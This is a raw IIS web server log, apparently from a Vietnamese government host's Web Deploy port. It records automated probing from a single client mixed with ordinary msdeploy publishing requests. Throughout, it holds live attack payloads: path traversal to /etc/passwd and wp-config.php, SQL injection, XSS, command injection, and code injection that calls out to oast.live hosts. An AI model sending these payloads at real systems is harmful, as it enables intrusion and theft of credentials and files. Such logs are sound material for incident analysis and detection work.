/AccessAnywhere/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 400 0 0 31 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 07:20:50 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 07:20:50 103.153.214.94 POST /tools.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172/tools.cgi 404 7 0 26 2023-06-29 07:20:50 103.153.214.94 POST /tools.cgi - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn:8172/tools.cgi 404 7 0 22 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 07:40:48 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 07:40:48 103.153.214.94 GET /components/com_ionfiles/download.php download=1&file=../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 26 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 08:02:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 08:02:49 103.153.214.94 GET /.magnolia/admincentral - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 36 2023-06-29 08:06:52 103.153.214.94 GET /SSI/Auth/ip_snmp.htm - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28 2023-06-29 08:08:23 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 - 116.96.78.85 - - 401 2 5 81 2023-06-29 08:08:23 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 74 2023-06-29 08:08:23 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 96 2023-06-29 08:08:23 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 610 2023-06-29 08:08:23 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 Unknown;sid=d4f76e19-64d3-43c3-8e18-8e6964ec99de;op=Sync - 200 0 0 364 2023-06-29 08:08:45 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 31 2023-06-29 08:08:45 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 31 2023-06-29 08:08:45 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 VS17.0:PublishDialog:WTE17.5.318.41597;sid=e4c424cf-88ef-4e70-b1f2-e015cb74da32;op=Sync - 200 0 0 371 2023-06-29 08:08:45 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 487 2023-06-29 08:08:45 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 281 2023-06-29 08:08:46 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 873 2023-06-29 08:08:46 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 VS17.0:PublishDialog:WTE17.5.318.41597;sid=e4c424cf-88ef-4e70-b1f2-e015cb74da32;op=Sync - 200 0 0 492 2023-06-29 08:09:23 103.153.214.94 POST /admin/ajax.php action=login 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 26 2023-06-29 08:09:23 103.153.214.94 GET /admin/view_car.php id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 56 2023-06-29 08:09:44 103.153.214.94 GET /wp-content/themes/churchope/lib/downloadlink.php file=../../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 29 2023-06-29 08:10:06 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 37 2023-06-29 08:10:06 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 33 2023-06-29 08:10:07 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 VS17.0:PublishDialog:WTE17.5.318.41597;sid=71e28d5d-d27e-4e7c-8322-177887095786;op=Sync - 200 0 0 1145 2023-06-29 08:10:07 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 1271 2023-06-29 08:10:07 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 34 2023-06-29 08:10:10 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 - - 200 0 0 3422 2023-06-29 08:10:10 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.78.85 VS17.0:PublishDialog:WTE17.5.318.41597;sid=71e28d5d-d27e-4e7c-8322-177887095786;op=Sync - 200 0 0 3299 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 08:30:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 08:30:01 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_perchaimageattach 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 32 2023-06-29 08:35:55 103.153.214.94 GET /filter/jmol/js/jsmol/php/jsmol.php call=getRawDataFromDatabase&query=file:///etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 31 2023-06-29 08:48:36 103.153.214.94 GET /language/lang - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 28 2023-06-29 08:48:36 103.153.214.94 GET /index.php sl=../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 24 2023-06-29 08:59:52 103.153.214.94 GET /resin-doc/resource/tutorial/jndi-appconfig/test inputFile=../../../../../index.jsp 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29 2023-06-29 09:01:32 103.153.214.94 POST /api/external/7.0/system.System.get_infos - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 36 2023-06-29 09:04:36 103.153.214.94 GET /password.html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 30 2023-06-29 09:10:22 103.153.214.94 GET /system/console - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 31 2023-06-29 09:12:30 103.153.214.94 GET /api/security/ticket - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 29 2023-06-29 09:12:53 103.153.214.94 POST /admin/ajax.php action=login 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 28 2023-06-29 09:12:53 103.153.214.94 GET /admin/manage_booking.php id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11--+ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 23 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 09:56:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 09:56:54 103.153.214.94 GET /_s_/dyn/Log_highlight href=../../../../windows/win.ini&n=1 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 26 2023-06-29 10:02:52 103.153.214.94 GET /info.html - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn:8172/info.html 404 7 0 27 2023-06-29 10:06:17 103.153.214.94 GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js mgrDn=a&pwd=a&url=%23{T(java.net.InetAddress).getByName('cibehhqofm2ke57n2m2gft4srqucb1m1o.oast.live')} 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 47 2023-06-29 10:10:17 103.153.214.94 GET /backend/backend/auth/signin - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 32 2023-06-29 10:20:53 103.153.214.94 GET /NCFindWeb filename=WEB-INF/web.xml&service=IPreAlertConfigService 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 27 2023-06-29 10:26:24 103.153.214.94 GET /wp-content/themes/oxygen-theme/download.php file=../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 27 2023-06-29 10:40:09 103.153.214.94 GET /index.php q=file:///etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 71 2023-06-29 10:53:59 103.153.214.94 GET /advanced_component_system/index.php ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 34 2023-06-29 10:56:27 103.153.214.94 GET /css/eonweb.css - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 27 2023-06-29 11:03:06 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 24 2023-06-29 11:03:18 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_powermail 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 48 2023-06-29 11:04:28 103.153.214.94 GET /metrics/v1/mbeans - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 34 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 11:28:58 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 11:28:58 103.153.214.94 GET /_ignition/scripts/--><svg+onload=alert(document.domain)> - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 400 0 0 32 2023-06-29 11:29:49 103.153.214.94 POST /console/images/%2e%2e%2fconsole.portal - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 400 0 0 33 2023-06-29 11:44:40 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 25 2023-06-29 11:44:40 103.153.214.94 GET /hp/device/webAccess/index.htm content=security 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 24 2023-06-29 11:56:13 103.153.214.94 GET /pme/media/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 27 2023-06-29 12:01:42 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_perchafieldsattach 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 28 2023-06-29 12:04:17 103.153.214.94 GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/<img/src/onerror=alert(document.domain)>/ debug=true 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 400 0 0 38 2023-06-29 12:08:16 103.153.214.94 GET /cgi-bin/broker BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&_DEBUG=131&_DEBUG=131&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&_PROGRAM=sample.webcsf1.sas&_SERVICE=targetservice&_WEBOUT=test&bgtype=COLOR&csftyp=classic,+ssfile1%3d/etc/passwd&style=a+tcolor%3dblue&sysparm=test 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 34 2023-06-29 12:13:51 103.153.214.94 POST /controller/origemdb.php idselorigem=ATIVOS 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 50 2023-06-29 12:13:53 103.153.214.94 POST /controller/login.php acao=autenticar 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 25 2023-06-29 12:13:53 103.153.214.94 POST /controller/login.php acao=autenticar 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 22 2023-06-29 12:21:46 103.153.214.94 GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php files[]=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 30 2023-06-29 12:29:31 103.153.214.94 GET /catalog.php filename=../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 32 2023-06-29 12:32:25 103.153.214.94 GET /login.zul - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 28 2023-06-29 12:36:44 103.153.214.94 POST /json-rpc/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 28 2023-06-29 12:49:21 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_rokdownloads 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 37 2023-06-29 12:52:09 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_zimbcore 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 27 2023-06-29 12:56:12 103.153.214.94 GET /admin/install/install.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28 2023-06-29 12:56:58 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_mscomment 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 25 2023-06-29 12:56:58 103.153.214.94 GET /maint/modules/home/index.php lang=english|cat%20/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 37 2023-06-29 12:59:14 103.153.214.94 POST /upload/index.php route=extension/payment/divido/update 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 31 2023-06-29 13:05:47 103.153.214.94 GET / action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 25 2023-06-29 13:11:56 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 29 2023-06-29 13:11:56 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 22 2023-06-29 13:11:56 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 42 2023-06-29 13:11:56 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 37 2023-06-29 13:11:57 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24 2023-06-29 13:11:57 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 22 2023-06-29 13:11:57 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 25 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 23 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 38 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 23 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 23 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 27 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 23 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 22 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 23 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 25 2023-06-29 13:11:58 103.153.214.94 GET /manager/html - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28 2023-06-29 13:22:44 103.153.214.94 GET /wp-content/plugins/insert-php/readme.txt - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 29 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 13:53:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 13:53:01 103.153.214.94 GET /jpeginfo/jpeginfo.php url=cibehhqofm2ke57n2m2gg1xgbwisschgk.oast.live 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 25 2023-06-29 14:01:08 103.153.214.94 GET /%5c%5ccibehhqofm2ke57n2m2gkixbaxw6z4bx8.oast.live%5cC$%5cbb - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 400 0 0 28 2023-06-29 14:04:12 103.153.214.94 GET /include/dialog/config.php adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 29 2023-06-29 14:11:19 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("nslookup+cibehhqofm2ke57n2m2gdh5gxkxq3onpe.oast.live")}__::.x/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 400 0 0 31 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-29 14:33:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-29 14:33:55 103.153.214.94 GET /index.php option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27 2023-06-29 14:38:57 103.153.214.94 GET /cgi-bin/cgibox .cab 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 31 2023-06-29 14:38:57 103.153.214.94 GET /cgi-bin/cgibox /nobody 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 22 2023-06-29 14:45:43 103.153.214.94 GET /install.php a=check 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 26 